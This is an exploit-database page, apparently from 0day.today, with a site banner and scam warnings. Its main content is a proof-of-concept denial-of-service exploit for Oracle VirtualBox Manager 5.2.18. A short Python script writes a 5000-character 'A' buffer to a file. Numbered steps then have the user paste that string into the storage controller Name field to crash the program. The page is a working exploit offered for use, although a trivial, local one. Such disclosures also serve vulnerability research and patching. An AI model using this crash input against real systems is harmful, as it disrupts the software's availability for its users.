0day.today - 世界最大的漏洞利用数据库。
0day.today 用户须知:
本站管理员使用官方账号。请谨防诈骗!
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币 金币
本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle VirtualBox Manager 5.2.18 r124319 - Name Attribute Denial of Service Exploit
# Exploit Title: Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC) # Discovery by: Jose Eduardo Castro # Vendor Homepage: https://www.virtualbox.org/ # Software Link: https://download.virtualbox.org/virtualbox/5.2.18/VirtualBox-5.2.18-124319-Win.exe # Tested Version: 5.2.18 r124319 # Tested on OS : Windows 7 Ultimate x64 es #!/usr/bin/env python #-*-coding: utf-8-*- # Steps to Produce the DoS: # 1.- Run python code : python vb_dos.py # 2.- Open string.txt and copy content to clipboard # 3.- Open VM VirtualBox Manager # 4.- Select a created virtual machine in mode "power off" and select "Settings" # 5.- Select "Storage" button # 6.- Select option "Adds new storage controller" and select any controller # 7.- Paste ClipBoard on "Name" # 8.- Clic OK # 9.- DoS import socket, os, sys buffer = "\x41" * 5000 f = open ("string.txt", "w") f.write(buffer) f.close() # 0day.today [2024-07-02] #